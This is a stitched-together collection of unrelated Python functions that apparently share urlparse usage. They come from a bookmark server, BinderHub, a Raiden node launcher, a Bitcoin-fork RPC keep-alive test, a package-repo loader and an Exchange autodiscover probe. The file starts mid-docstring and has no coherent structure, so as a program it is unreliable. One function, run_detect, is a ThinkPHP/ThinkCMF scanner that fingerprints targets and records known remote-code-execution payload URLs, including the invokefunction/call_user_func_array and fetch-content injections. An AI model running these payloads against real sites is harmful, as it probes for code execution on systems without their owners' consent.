    registers the API routes and the admin views, and returns the app.

    Raises ImportError when a reverse-proxy path is configured but
    ``ReverseProxyPrefixFix`` is not available.
    """
    flask_app = FlaskAPI(__name__)

    # Page size: non-positive values fall back to the default.
    page_size = int(
        os.getenv('BUKUSERVER_PER_PAGE', str(views.DEFAULT_PER_PAGE)))
    if not page_size > 0:
        page_size = views.DEFAULT_PER_PAGE
    flask_app.config['BUKUSERVER_PER_PAGE'] = page_size

    # URL render mode: anything but 'full' / 'netloc' falls back to the default.
    render_mode = os.getenv('BUKUSERVER_URL_RENDER_MODE', views.DEFAULT_URL_RENDER_MODE)
    if render_mode not in ('full', 'netloc'):
        render_mode = views.DEFAULT_URL_RENDER_MODE
    flask_app.config['BUKUSERVER_URL_RENDER_MODE'] = render_mode

    secret_key = os.getenv('BUKUSERVER_SECRET_KEY')
    if not secret_key:
        secret_key = os.urandom(24)
    flask_app.config['SECRET_KEY'] = secret_key

    flask_app.config['BUKUSERVER_DISABLE_FAVICON'] = \
        get_bool_from_env_var('BUKUSERVER_DISABLE_FAVICON', True)
    flask_app.config['BUKUSERVER_OPEN_IN_NEW_TAB'] = \
        get_bool_from_env_var('BUKUSERVER_OPEN_IN_NEW_TAB', False)
    flask_app.config['BUKUSERVER_DB_FILE'] = os.getenv(
        'BUKUSERVER_DB_FILE') or db_file

    # Optional reverse-proxy prefix; malformed values only produce warnings.
    proxy_prefix = os.getenv('BUKUSERVER_REVERSE_PROXY_PATH')
    if proxy_prefix:
        if not proxy_prefix.startswith('/'):
            print('Warning: reverse proxy path should include preceding slash')
        if proxy_prefix.endswith('/'):
            print(
                'Warning: reverse proxy path should not include trailing slash'
            )
        flask_app.config['REVERSE_PROXY_PATH'] = proxy_prefix
        if not ReverseProxyPrefixFix:
            raise ImportError('Failed to import ReverseProxyPrefixFix')
        ReverseProxyPrefixFix(flask_app)

    database = BukuDb(dbfile=flask_app.config['BUKUSERVER_DB_FILE'])
    flask_app.app_context().push()
    setattr(flask.g, 'bukudb', database)

    @flask_app.shell_context_processor
    def shell_context():
        """Shell context definition."""
        return {'app': flask_app, 'bukudb': database}

    # Template filter returning only the network location of a URL.
    flask_app.jinja_env.filters['netloc'] = lambda x: urlparse(x).netloc  # pylint: disable=no-member

    Bootstrap(flask_app)
    index_view = views.CustomAdminIndexView(
        template='bukuserver/home.html', url='/')
    admin_site = Admin(
        flask_app, name='buku server', template_mode='bootstrap3',
        index_view=index_view)

    # routing
    #  api
    add_rule = flask_app.add_url_rule

    tags_view = ApiTagView.as_view('tag_api')
    add_rule('/api/tags', defaults={'tag': None}, view_func=tags_view, methods=['GET'])
    add_rule('/api/tags/<tag>', view_func=tags_view, methods=['GET', 'PUT'])

    bookmarks_view = ApiBookmarkView.as_view('bookmark_api')
    add_rule(
        '/api/bookmarks', defaults={'rec_id': None},
        view_func=bookmarks_view, methods=['GET', 'POST', 'DELETE'])
    add_rule(
        '/api/bookmarks/<int:rec_id>',
        view_func=bookmarks_view, methods=['GET', 'PUT', 'DELETE'])
    add_rule(
        '/api/bookmarks/refresh', 'refresh_bookmark', refresh_bookmark,
        defaults={'rec_id': None}, methods=['POST'])
    add_rule(
        '/api/bookmarks/<int:rec_id>/refresh', 'refresh_bookmark', refresh_bookmark,
        methods=['POST'])
    add_rule('/api/bookmarks/<int:rec_id>/tiny', 'get_tiny_url', get_tiny_url, methods=['GET'])
    add_rule('/api/network_handle', 'network_handle', handle_network, methods=['POST'])

    range_view = ApiBookmarkRangeView.as_view(
        'bookmark_range_api')
    add_rule(
        '/api/bookmarks/<int:starting_id>/<int:ending_id>',
        view_func=range_view, methods=['GET', 'PUT', 'DELETE'])

    search_view = ApiBookmarkSearchView.as_view(
        'bookmark_search_api')
    add_rule(
        '/api/bookmarks/search',
        view_func=search_view, methods=['GET', 'DELETE'])

    bookmarklet = BookmarkletView.as_view('bookmarklet')
    add_rule('/bookmarklet', view_func=bookmarklet, methods=['GET'])

    #  non api
    admin_site.add_view(
        views.BookmarkModelView(
            database, 'Bookmarks', page_size=page_size, url_render_mode=render_mode))
    admin_site.add_view(views.TagModelView(database, 'Tags', page_size=page_size))
    admin_site.add_view(
        views.StatisticView(database, 'Statistic', endpoint='statistic'))
    return flask_app
def is_safe_url(target):
    """Tell whether ``target`` is a safe redirect destination.

    ``target`` is resolved against the current request's host URL; it is safe
    when the result uses http or https and has the same network location as
    the host URL.
    """
    host_reference = urlparse(request.host_url)
    candidate = urlparse(urljoin(request.host_url, target))
    if candidate.scheme not in ('http', 'https'):
        return False
    return host_reference.netloc == candidate.netloc
def initialize(self, *args, **kwargs):
    """Load the configuration and assemble the Tornado application.

    After the parent initialisation and config-file loading this sets up
    logging, pycurl, the kubernetes client (only when a builder is required),
    the thread pools, the jinja2 environment, the optional docker registry,
    the launcher and the event log, fills ``self.tornado_settings`` and
    finally builds ``self.tornado_app`` from the URL handlers.
    """
    super().initialize(*args, **kwargs)
    self.load_config_file(self.config_file)

    # hook up tornado logging
    if self.debug:
        self.log_level = logging.DEBUG
    tornado.options.options.logging = logging.getLevelName(self.log_level)
    tornado.log.enable_pretty_logging()
    self.log = tornado.log.app_log

    self.init_pycurl()

    # initialize kubernetes config: in-cluster first, local kube config as fallback
    if self.builder_required:
        try:
            kubernetes.config.load_incluster_config()
        except kubernetes.config.ConfigException:
            kubernetes.config.load_kube_config()
        core_api = kubernetes.client.CoreV1Api()
        self.tornado_settings["kubernetes_client"] = core_api
        self.kube_client = core_api

    # times 2 for log + build threads
    self.build_pool = ThreadPoolExecutor(self.concurrent_build_limit * 2)
    # default executor for asyncifying blocking calls (e.g. to kubernetes, docker).
    # this should not be used for long-running requests
    self.executor = ThreadPoolExecutor(self.executor_threads)

    # Custom templates are searched first; the base templates come last and
    # are additionally reachable under the 'templates/' prefix.
    default_templates = self._template_path_default()
    search_paths = [self.template_path]
    if default_templates not in search_paths:
        search_paths.append(default_templates)
    prefixed_base = PrefixLoader({'templates': FileSystemLoader([default_templates])}, '/')
    jinja_env = Environment(
        loader=ChoiceLoader([prefixed_base, FileSystemLoader(search_paths)]),
        autoescape=True,
    )

    # A registry is only needed when images are both built and pushed.
    registry = None
    if self.use_registry and self.builder_required:
        registry = DockerRegistry(parent=self)

    self.launcher = Launcher(
        parent=self,
        hub_url=self.hub_url,
        hub_url_local=self.hub_url_local,
        hub_api_token=self.hub_api_token,
        create_user=not self.auth_enabled,
    )

    self.event_log = EventLog(parent=self)
    schema_pattern = os.path.join(HERE, 'event-schemas', '*.json')
    for schema_path in glob(schema_pattern):
        with open(schema_path) as schema_fp:
            self.event_log.register_schema(json.load(schema_fp))

    app_settings = {
        "log_function": log_request,
        "push_secret": self.push_secret,
        "image_prefix": self.image_prefix,
        "debug": self.debug,
        "launcher": self.launcher,
        "appendix": self.appendix,
        "ban_networks": self.ban_networks,
        "ban_networks_min_prefix_len": self.ban_networks_min_prefix_len,
        "build_namespace": self.build_namespace,
        "build_image": self.build_image,
        "build_node_selector": self.build_node_selector,
        "build_pool": self.build_pool,
        "sticky_builds": self.sticky_builds,
        "log_tail_lines": self.log_tail_lines,
        "pod_quota": self.pod_quota,
        "per_repo_quota": self.per_repo_quota,
        "per_repo_quota_higher": self.per_repo_quota_higher,
        "repo_providers": self.repo_providers,
        "use_registry": self.use_registry,
        "registry": registry,
        "traitlets_config": self.config,
        "google_analytics_code": self.google_analytics_code,
        "google_analytics_domain": self.google_analytics_domain,
        "about_message": self.about_message,
        "banner_message": self.banner_message,
        "extra_footer_scripts": self.extra_footer_scripts,
        "jinja2_env": jinja_env,
        "build_memory_limit": self.build_memory_limit,
        "build_memory_request": self.build_memory_request,
        "build_docker_host": self.build_docker_host,
        "build_docker_config": self.build_docker_config,
        "base_url": self.base_url,
        "badge_base_url": self.badge_base_url,
        "static_path": os.path.join(HERE, "static"),
        "static_url_prefix": url_path_join(self.base_url, "static/"),
        "template_variables": self.template_variables,
        "executor": self.executor,
        "auth_enabled": self.auth_enabled,
        "event_log": self.event_log,
        "normalized_origin": self.normalized_origin,
    }
    self.tornado_settings.update(app_settings)
    if self.auth_enabled:
        self.tornado_settings['cookie_secret'] = os.urandom(32)

    static_root = self.tornado_settings['static_path']
    static_file = tornado.web.StaticFileHandler
    # Single files served straight from <static>/images:
    # /badge.svg, /badge_logo.svg, /logo_social.png, /favicon_XXX.ico
    image_routes = [
        (pattern, static_file, {'path': os.path.join(static_root, 'images')})
        for pattern in (
            r'/(badge\.svg)',
            r'/(badge\_logo\.svg)',
            r'/(logo\_social\.png)',
            r'/(favicon\_fail\.ico)',
            r'/(favicon\_success\.ico)',
            r'/(favicon\_building\.ico)',
        )
    ]

    handlers = [
        (r'/metrics', MetricsHandler),
        (r'/versions', VersionHandler),
        (r"/build/([^/]+)/(.+)", BuildHandler),
        (r"/v2/([^/]+)/(.+)", ParameterizedMainHandler),
        (r"/repo/([^/]+)/([^/]+)(/.*)?", LegacyRedirectHandler),
        # for backward-compatible mybinder.org badge URLs
        # /assets/images/badge.svg
        (r'/assets/(images/badge\.svg)', static_file, {'path': static_root}),
    ]
    handlers.extend(image_routes)
    handlers.extend([
        (r'/about', AboutHandler),
        (r'/health', HealthHandler, {'hub_url': self.hub_url_local}),
        (r'/_config', ConfigHandler),
        (r'/', MainHandler),
        (r'.*', Custom404),
    ])
    handlers = self.add_url_prefix(self.base_url, handlers)

    # Late additions go in front of the final entry of the handler list
    # (the catch-all is the last handler passed to add_url_prefix above).
    if self.extra_static_path:
        extra_prefix = url_path_join(self.base_url, self.extra_static_url_prefix)
        handlers.insert(-1, (
            re.escape(extra_prefix) + r"(.*)",
            static_file,
            {'path': self.extra_static_path},
        ))
    if self.auth_enabled:
        callback_url = os.getenv('JUPYTERHUB_OAUTH_CALLBACK_URL') or \
            url_path_join(self.base_url, 'oauth_callback')
        callback_path = urlparse(callback_url).path
        handlers.insert(-1, (re.escape(callback_path), HubOAuthCallbackHandler))

    self.tornado_app = tornado.web.Application(handlers, **self.tornado_settings)
def run_app(
        address,
        keystore_path,
        gas_price,
        eth_rpc_endpoint,
        tokennetwork_registry_contract_address,
        secret_registry_contract_address,
        endpoint_registry_contract_address,
        listen_address,
        mapped_socket,
        max_unresponsive_time,
        api_address,
        rpc,
        sync_check,
        console,
        password_file,
        web_ui,
        datadir,
        transport,
        matrix_server,
        network_id,
        environment_type,
        unrecoverable_error_should_crash,
        pathfinding_service_address,
        pathfinding_max_paths,
        config=None,
        extra_config=None,
        **kwargs,
):
    """Configure, create and start a Raiden ``App`` from the given options.

    The function fills ``config`` from the arguments, connects to the
    Ethereum node behind ``eth_rpc_endpoint``, verifies that the node's
    network id matches ``network_id``, resolves the token-network and secret
    registry contracts, sets up the chosen transport ('udp' or 'matrix') and
    starts the application.

    Returns the started ``App`` instance.

    Raises ``RuntimeError`` when the udp transport is requested without
    ``mapped_socket`` or when ``transport`` names an unknown transport.
    Several failure paths (network id mismatch, development environment
    on network id 1, missing contract addresses, ``RaidenError`` while
    creating the app, ``RuntimeError`` or a lock timeout while starting it)
    print a message in red and terminate through ``sys.exit(1)``.

    NOTE(review): ``config`` defaults to None but is indexed right away, so
    callers presumably always pass a prepared dict - confirm.
    """
    # pylint: disable=too-many-locals,too-many-branches,too-many-statements,unused-argument

    from raiden.app import App

    _assert_sql_version()

    if transport == 'udp' and not mapped_socket:
        raise RuntimeError('Missing socket')

    # Default data directory: ~/.raiden
    if datadir is None:
        datadir = os.path.join(os.path.expanduser('~'), '.raiden')

    # Resolve the account to use and its private key.
    address_hex = to_normalized_address(address) if address else None
    address_hex, privatekey_bin = prompt_account(address_hex, keystore_path, password_file)
    address = to_canonical_address(address_hex)

    (listen_host, listen_port) = split_endpoint(listen_address)
    (api_host, api_port) = split_endpoint(api_address)

    config['transport']['udp']['host'] = listen_host
    config['transport']['udp']['port'] = listen_port
    config['console'] = console
    config['rpc'] = rpc
    # The web UI is only enabled together with the RPC interface.
    config['web_ui'] = rpc and web_ui
    config['api_host'] = api_host
    config['api_port'] = api_port
    if mapped_socket:
        config['socket'] = mapped_socket.socket
        config['transport']['udp']['external_ip'] = mapped_socket.external_ip
        config['transport']['udp']['external_port'] = mapped_socket.external_port
    config['transport_type'] = transport
    config['transport']['matrix']['server'] = matrix_server
    config['transport']['udp']['nat_keepalive_retries'] = DEFAULT_NAT_KEEPALIVE_RETRIES
    # Spread the maximum unresponsive time evenly over the keepalive retries.
    timeout = max_unresponsive_time / DEFAULT_NAT_KEEPALIVE_RETRIES
    config['transport']['udp']['nat_keepalive_timeout'] = timeout
    config['unrecoverable_error_should_crash'] = unrecoverable_error_should_crash
    config['services']['pathfinding_service_address'] = pathfinding_service_address
    config['services']['pathfinding_max_paths'] = pathfinding_max_paths

    # An endpoint given without a scheme is treated as plain http.
    parsed_eth_rpc_endpoint = urlparse(eth_rpc_endpoint)
    if not parsed_eth_rpc_endpoint.scheme:
        eth_rpc_endpoint = f'http://{eth_rpc_endpoint}'

    web3 = _setup_web3(eth_rpc_endpoint)

    rpc_client = JSONRPCClient(
        web3,
        privatekey_bin,
        gas_price_strategy=gas_price,
        block_num_confirmations=DEFAULT_NUMBER_OF_BLOCK_CONFIRMATIONS,
        uses_infura='infura.io' in eth_rpc_endpoint,
    )

    blockchain_service = BlockChainService(
        jsonrpc_client=rpc_client,
        # Not giving the contract manager here, but injecting it later
        # since we first need blockchain service to calculate the network id
    )

    given_network_id = network_id
    node_network_id = blockchain_service.network_id
    known_given_network_id = given_network_id in ID_TO_NETWORKNAME
    known_node_network_id = node_network_id in ID_TO_NETWORKNAME

    # Abort when the node is on a different network than the one requested;
    # network names are shown when both ids are known, raw ids otherwise.
    if node_network_id != given_network_id:
        if known_given_network_id and known_node_network_id:
            click.secho(
                f"The chosen ethereum network '{ID_TO_NETWORKNAME[given_network_id]}' "
                f"differs from the ethereum client '{ID_TO_NETWORKNAME[node_network_id]}'. "
                "Please update your settings.",
                fg='red',
            )
        else:
            click.secho(
                f"The chosen ethereum network id '{given_network_id}' differs "
                f"from the ethereum client '{node_network_id}'. "
                "Please update your settings.",
                fg='red',
            )
        sys.exit(1)

    config['chain_id'] = given_network_id

    # interpret the provided string argument
    if environment_type == Environment.PRODUCTION:
        # Safe configuration: restrictions for mainnet apply and matrix rooms have to be private
        config['environment_type'] = Environment.PRODUCTION
        config['transport']['matrix']['private_rooms'] = True
    else:
        config['environment_type'] = Environment.DEVELOPMENT

    environment_type = config['environment_type']
    print(f'Raiden is running in {environment_type.value.lower()} mode')

    # NOTE(review): chain_config is never populated in this function, so the
    # 'contracts' lookup further down always falls through to start_block = 0.
    chain_config = {}
    contract_addresses_known = False
    contracts = dict()
    # The development environment uses the 'pre_limits' contracts version;
    # otherwise None is passed on.
    contracts_version = 'pre_limits' if environment_type == Environment.DEVELOPMENT else None
    config['contracts_path'] = contracts_precompiled_path(contracts_version)
    # Deployment data is looked up for every named network except 'smoketest'.
    if node_network_id in ID_TO_NETWORKNAME and ID_TO_NETWORKNAME[node_network_id] != 'smoketest':
        deployment_data = get_contracts_deployed(node_network_id, contracts_version)
        not_allowed = (  # for now we only disallow mainnet with test configuration
            network_id == 1 and
            environment_type == Environment.DEVELOPMENT)
        if not_allowed:
            click.secho(
                f'The chosen network ({ID_TO_NETWORKNAME[node_network_id]}) is not a testnet, '
                'but the "development" environment was selected.\n'
                'This is not allowed. Please start again with a safe environment setting '
                '(--environment production).',
                fg='red',
            )
            sys.exit(1)

        contracts = deployment_data['contracts']
        contract_addresses_known = True

    blockchain_service.inject_contract_manager(ContractManager(config['contracts_path']))

    if sync_check:
        check_synced(blockchain_service, known_node_network_id)

    # Addresses count as "given" only when all three registries were supplied.
    contract_addresses_given = (
        tokennetwork_registry_contract_address is not None and
        secret_registry_contract_address is not None and
        endpoint_registry_contract_address is not None)

    if not contract_addresses_given and not contract_addresses_known:
        click.secho(
            f"There are no known contract addresses for network id '{given_network_id}'. "
            "Please provide them on the command line or in the configuration file.",
            fg='red',
        )
        sys.exit(1)

    # An explicitly given registry address wins over the deployed one.
    # NOTE(review): the handle_* helpers presumably terminate the process;
    # otherwise token_network_registry / secret_registry would be unbound
    # below - confirm.
    try:
        token_network_registry = blockchain_service.token_network_registry(
            tokennetwork_registry_contract_address or to_canonical_address(
                contracts[CONTRACT_TOKEN_NETWORK_REGISTRY]['address'],
            ),
        )
    except ContractVersionMismatch as e:
        handle_contract_version_mismatch(e)
    except AddressWithoutCode:
        handle_contract_no_code('token network registry', tokennetwork_registry_contract_address)
    except AddressWrongContract:
        handle_contract_wrong_address(
            'token network registry',
            tokennetwork_registry_contract_address,
        )

    try:
        secret_registry = blockchain_service.secret_registry(
            secret_registry_contract_address or to_canonical_address(
                contracts[CONTRACT_SECRET_REGISTRY]['address'],
            ),
        )
    except ContractVersionMismatch as e:
        handle_contract_version_mismatch(e)
    except AddressWithoutCode:
        handle_contract_no_code('secret registry', secret_registry_contract_address)
    except AddressWrongContract:
        handle_contract_wrong_address('secret registry', secret_registry_contract_address)

    # The database lives in a directory specific to the node address, the
    # network id and the token network registry; the file name carries the
    # DB version.
    database_path = os.path.join(
        datadir,
        f'node_{pex(address)}',
        f'netid_{given_network_id}',
        f'network_{pex(token_network_registry.address)}',
        f'v{RAIDEN_DB_VERSION}_log.db',
    )
    config['database_path'] = database_path

    print(
        '\nYou are connected to the \'{}\' network and the DB path is: {}'.
        format(
            ID_TO_NETWORKNAME.get(given_network_id, given_network_id),
            database_path,
        ),
    )

    # From here on `transport` holds the transport object returned by the
    # setup helper instead of the transport name.
    discovery = None
    if transport == 'udp':
        transport, discovery = _setup_udp(
            config,
            blockchain_service,
            address,
            contracts,
            endpoint_registry_contract_address,
        )
    elif transport == 'matrix':
        transport = _setup_matrix(config)
    else:
        raise RuntimeError(f'Unknown transport type "{transport}" given')

    raiden_event_handler = RaidenEventHandler()
    message_handler = MessageHandler()

    try:
        if 'contracts' in chain_config:
            start_block = chain_config['contracts']['TokenNetworkRegistry']['block_number']
        else:
            start_block = 0

        raiden_app = App(
            config=config,
            chain=blockchain_service,
            query_start_block=start_block,
            default_registry=token_network_registry,
            default_secret_registry=secret_registry,
            transport=transport,
            raiden_event_handler=raiden_event_handler,
            message_handler=message_handler,
            discovery=discovery,
        )
    except RaidenError as e:
        click.secho(f'FATAL: {e}', fg='red')
        sys.exit(1)

    try:
        raiden_app.start()
    except RuntimeError as e:
        click.secho(f'FATAL: {e}', fg='red')
        sys.exit(1)
    except filelock.Timeout:
        # The lock timed out; reported as another instance already running
        # for this account and network.
        name_or_id = ID_TO_NETWORKNAME.get(given_network_id, given_network_id)
        click.secho(
            f'FATAL: Another Raiden instance already running for account {address_hex} on '
            f'network id {name_or_id}',
            fg='red',
        )
        sys.exit(1)

    return raiden_app
def is_absolute(url):
    """Report whether ``url`` is absolute, i.e. carries a network location.

    Approach taken from
    https://stackoverflow.com/questions/8357098/how-can-i-check-if-a-url-is-absolute-using-python

    :param url: URL to inspect.
    :return: ``True`` when the parsed URL has a non-empty ``netloc``,
        ``False`` otherwise.
    """
    components = urlparse(url)
    return True if components.netloc else False
def filename(self):
    """Return the final path segment of the stored URL.

    Only the path component of the URL is considered, so query string and
    fragment are not part of the result.  When the path contains no ``/``
    the whole path is returned.
    """
    url_path = urlparse(self.__url).path
    # Everything after the last "/" (or the whole path if there is none).
    _, _, last_segment = url_path.rpartition('/')
    return last_segment
def run_test(self):
    """Check HTTP keep-alive handling of the nodes' JSON-RPC endpoints.

    Sends raw ``httplib`` requests with HTTP basic auth and asserts, per
    scenario, that the reply contains ``"error":null`` and whether the
    client socket is still open afterwards:

    * node 0 with default headers (two requests on one connection),
    * node 0 with an explicit ``Connection: keep-alive`` header,
    * node 0 with an explicit ``Connection: close`` header,
    * node 1 (described as running with keep-alive disabled),
    * node 2 (described as running with default keep-alive settings).

    Finally checks the HTTP status returned by node 2 for long request URIs.
    """
    #################################################
    # lowlevel check for http persistent connection #
    #################################################
    url = urlparse.urlparse(self.nodes[0].url)
    authpair = url.username + ':' + url.password
    headers = {"Authorization": "Basic " + base64.b64encode(authpair)}

    conn = httplib.HTTPConnection(url.hostname, url.port)
    conn.connect()
    conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
    out1 = conn.getresponse().read()
    assert_equal('"error":null' in out1, True)
    # according to http/1.1 connection must still be open!
    assert_equal(conn.sock is not None, True)

    # send 2nd request without closing connection
    conn.request('POST', '/', '{"method": "getchaintips"}', headers)
    out2 = conn.getresponse().read()
    # the second reply must also be a correct json-rpc message, so check
    # out2 (checking out1 again would never validate this response)
    assert_equal('"error":null' in out2, True)
    # according to http/1.1 connection must still be open!
    assert_equal(conn.sock is not None, True)
    conn.close()

    # same should be if we add keep-alive because this should be the std. behaviour
    headers = {
        "Authorization": "Basic " + base64.b64encode(authpair),
        "Connection": "keep-alive"
    }

    conn = httplib.HTTPConnection(url.hostname, url.port)
    conn.connect()
    conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
    out1 = conn.getresponse().read()
    assert_equal('"error":null' in out1, True)
    # according to http/1.1 connection must still be open!
    assert_equal(conn.sock is not None, True)

    # send 2nd request without closing connection
    conn.request('POST', '/', '{"method": "getchaintips"}', headers)
    out2 = conn.getresponse().read()
    # must also respond with a correct json-rpc message
    assert_equal('"error":null' in out2, True)
    # according to http/1.1 connection must still be open!
    assert_equal(conn.sock is not None, True)
    conn.close()

    # now do the same with "Connection: close"
    headers = {
        "Authorization": "Basic " + base64.b64encode(authpair),
        "Connection": "close"
    }

    conn = httplib.HTTPConnection(url.hostname, url.port)
    conn.connect()
    conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
    out1 = conn.getresponse().read()
    assert_equal('"error":null' in out1, True)
    # now the connection must be closed after the response
    assert_equal(conn.sock is not None, False)

    # node1 (2nd node) is running with disabled keep-alive option
    urlNode1 = urlparse.urlparse(self.nodes[1].url)
    authpair = urlNode1.username + ':' + urlNode1.password
    headers = {"Authorization": "Basic " + base64.b64encode(authpair)}

    conn = httplib.HTTPConnection(urlNode1.hostname, urlNode1.port)
    conn.connect()
    conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
    out1 = conn.getresponse().read()
    assert_equal('"error":null' in out1, True)

    # node2 (third node) is running with standard keep-alive parameters
    # which means keep-alive is on
    urlNode2 = urlparse.urlparse(self.nodes[2].url)
    authpair = urlNode2.username + ':' + urlNode2.password
    headers = {"Authorization": "Basic " + base64.b64encode(authpair)}

    conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port)
    conn.connect()
    conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
    out1 = conn.getresponse().read()
    assert_equal('"error":null' in out1, True)
    # connection must still be open because civilbitd should use
    # keep-alive by default
    assert_equal(conn.sock is not None, True)

    # Check excessive request size
    conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port)
    conn.connect()
    conn.request('GET', '/' + ('x' * 1000), '', headers)
    out1 = conn.getresponse()
    assert_equal(out1.status, httplib.NOT_FOUND)

    conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port)
    conn.connect()
    conn.request('GET', '/' + ('x' * 10000), '', headers)
    out1 = conn.getresponse()
    assert_equal(out1.status, httplib.BAD_REQUEST)
def run_detect(self, url):
    """Probe ``url`` for ThinkPHP / ThinkCMF fingerprints.

    Three GET requests are issued (10 second timeout, certificate
    verification disabled).  For every fingerprint that matches, the
    candidate exploit URL is printed in red via ``cprint`` and appended to
    ``self.vul_list`` as ``[label, exploit_url]``.

    :param url: target base URL; ``https://`` is prepended when it has no
        scheme.
    :return: ``None``.  Any exception raised while probing is swallowed so
        that one failing target does not abort the caller.
    """
    if not urlparse(url).scheme:
        url = 'https://' + url

    try:
        # ThinkPHP 2.1 banner ("{ Fast & Simple OOP PHP Framework }") -> rce.
        # No reliable fingerprint for ThinkPHP 5.1 has been found yet, so the
        # error page of a non-existent route is used for it as well.
        rep = requests.get(url + "/index.php/herxdjhrelzfndk.html",
                           timeout=10, verify=False)
        if ("ThinkPHP" in rep.text and "2.1" in rep.text
                and "{ Fast & Simple OOP PHP Framework }" in rep.text):
            payload = url + "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"
            cprint('[thinkphp 3.0 rce ] {}'.format(payload), 'red')
            self.vul_list.append(['thinkphp 3.0', payload])

        if ("ThinkPHP" in rep.text and "5.1" in rep.text
                and "www.thinkphp.cn" in rep.text):
            payload = (url + "/index.php?s=index/\\think\\Request/input"
                             "&filter=phpinfo&data=1")
            cprint('[thinkphp 5.1 rce ] {}'.format(payload), 'red')
            # Record the same 5.1 payload that is printed (the 3.0 payload
            # used to be stored here by mistake).
            self.vul_list.append(['thinkphp 5.1', payload])

        # thinkphp 3.2: detect rce via the 4e5e5d7364f443e28fbf0d3ae744a59a
        # controller, which answers with a PNG.
        rep = requests.get(url + "/index.php?c=4e5e5d7364f443e28fbf0d3ae744a59a",
                           timeout=10, verify=False)
        if rep.status_code == 200 and "PNG" in rep.text:
            payload = url + "/?a=fetch&content=<?php%20phpinfo();die();"
            cprint('[thinkcmf 3.2 rce ] {}'.format(payload), 'red')
            self.vul_list.append(['thinkcmf 3.2', payload])

        # thinkphp 5.0: detect via index.php?s=captcha, which answers with a PNG.
        rep = requests.get(url + "/index.php?s=captcha", timeout=10, verify=False)
        if rep.status_code == 200 and "PNG" in rep.text:
            payload = (url + "/index.php/?s=index/\\think\\app/invokefunction"
                             "&function=call_user_func_array"
                             "&vars[0]=phpinfo&vars[1][]=1")
            cprint('[thinkphp 5.0 rce ] {}'.format(payload), 'red')
            self.vul_list.append(['thinkphp 5.0', payload])
    except Exception:
        # Deliberately best-effort: unreachable or misbehaving targets are
        # skipped silently.
        pass
def __init__(self, url, dist=None, comp=None, arch='iphoneos-arm'):
    """Load repository metadata and the package index from ``url``.

    :param url: base URL of the repository.
    :param dist: distribution name; when ``None`` the ``Release`` file is
        fetched from the repository root instead of ``dists/<dist>/``.
    :param comp: component name; the ``dists/<dist>/<comp>/binary-<arch>``
        layout is used only when both ``dist`` and ``comp`` are given.
    :param arch: architecture used to build the ``binary-<arch>`` path.
    """
    self.url = url

    release_path = 'Release' if dist is None else '/'.join(('dists', dist, 'Release'))
    release = self._fetch_relative(release_path, verify=False)
    if not release.ok:
        # No usable Release file: derive name and label from the URL itself.
        self._release = dict()
        url_parts = urlparse(self.url)
        self.name = url_parts.netloc + url_parts.path
        self.label = self.name
    else:
        self._release = Utils.asstring_to_dict(release.text)
        self.name = self._release['Origin']
        self.label = self._release.get('Label', self.name)

    # Map each file listed under "MD5Sum" to its expected size and checksum.
    self._integrity_by_file = dict()
    if 'MD5Sum' in self._release:
        for raw_entry in self._release['MD5Sum'].split('\n'):
            entry = raw_entry.strip()
            if not entry:
                continue
            md5sum, size, name = map(str.strip, entry.split())
            self._integrity_by_file[name] = {'size': int(size), 'md5': md5sum}

    self.packages = list()
    self.packages_by_name = dict()

    if dist is None or comp is None:
        packages_path = 'Packages'
    else:
        packages_path = '/'.join(
            ('dists', dist, comp, 'binary-' + arch, 'Packages'))

    # Package stanzas are separated by blank lines.
    for stanza in self._fetch_bz2(packages_path).split('\n\n'):
        if not stanza:
            continue
        pkg = Package(stanza, self)
        self.packages.append(pkg)

        if pkg.name not in self.packages_by_name:
            self.packages_by_name[pkg.name] = pkg
            continue

        # Duplicate name: keep whichever entry has the greater version.
        previous = self.packages_by_name[pkg.name]
        if pkg.version > previous.version:
            self.packages_by_name[pkg.name] = pkg
def _get_unauthenticated_response(self, url, method='post'):
    """Send one unauthenticated request to ``url`` and guess the auth type.

    POST is the default: HEAD is too error prone, and some servers are set
    up to redirect to OWA on all requests except POST to the autodiscover
    endpoint.

    :param url: URL to probe.
    :param method: name of the session method to call; for ``'post'`` the
        autodiscover payload for ``self.email`` is sent as request data.
    :return: tuple ``(auth_type, response)``.
    :raises TransportError: if the host has no DNS entry, on TLS errors, or
        on connection errors once the retry policy no longer allows a retry.
    """
    # We are connecting to untrusted servers here, so take necessary precautions.
    hostname = urlparse(url).netloc
    if not is_valid_hostname(hostname, timeout=AutodiscoverProtocol.TIMEOUT):
        # 'requests' is really bad at reporting that a hostname cannot be
        # resolved, so this is checked separately. DNS errors are not
        # retried; they will most likely be persistent.
        raise TransportError('%r has no DNS entry' % hostname)

    request_kwargs = {
        'url': url,
        'headers': DEFAULT_HEADERS.copy(),
        'allow_redirects': False,
        'timeout': AutodiscoverProtocol.TIMEOUT,
    }
    if method == 'post':
        request_kwargs['data'] = Autodiscover.payload(email=self.email)

    retry = 0
    t_start = time.monotonic()
    while True:
        _back_off_if_needed(self.INITIAL_RETRY_POLICY.back_off_until)
        log.debug('Trying to get response from %s', url)
        with AutodiscoverProtocol.raw_session() as session:
            try:
                r = getattr(session, method)(**request_kwargs)
                r.close()  # Release memory
                break
            except TLS_ERRORS as err:
                # Don't retry on TLS errors. They will most likely be persistent.
                raise TransportError(str(err))
            except CONNECTION_ERRORS as err:
                r = DummyResponse(url=url, headers={},
                                  request_headers=request_kwargs['headers'])
                total_wait = time.monotonic() - t_start
                if not _may_retry_on_error(response=r,
                                           retry_policy=self.INITIAL_RETRY_POLICY,
                                           wait=total_wait):
                    log.debug("Connection error on URL %s: %s", url, err)
                    raise TransportError(str(err))
                log.debug("Connection error on URL %s (retry %s, error: %s). Cool down",
                          url, retry, err)
                self.INITIAL_RETRY_POLICY.back_off(self.RETRY_WAIT)
                retry += 1
                # Falling out of the handler starts the next loop iteration.

    try:
        auth_type = get_auth_method_from_response(response=r)
    except UnauthorizedError:
        # Failed to guess the auth type
        auth_type = NOAUTH

    if r.status_code in (301, 302) and 'location' in r.headers:
        # Make the redirect URL absolute; drop the header if that fails.
        try:
            r.headers['location'] = get_redirect_url(r)
        except TransportError:
            del r.headers['location']
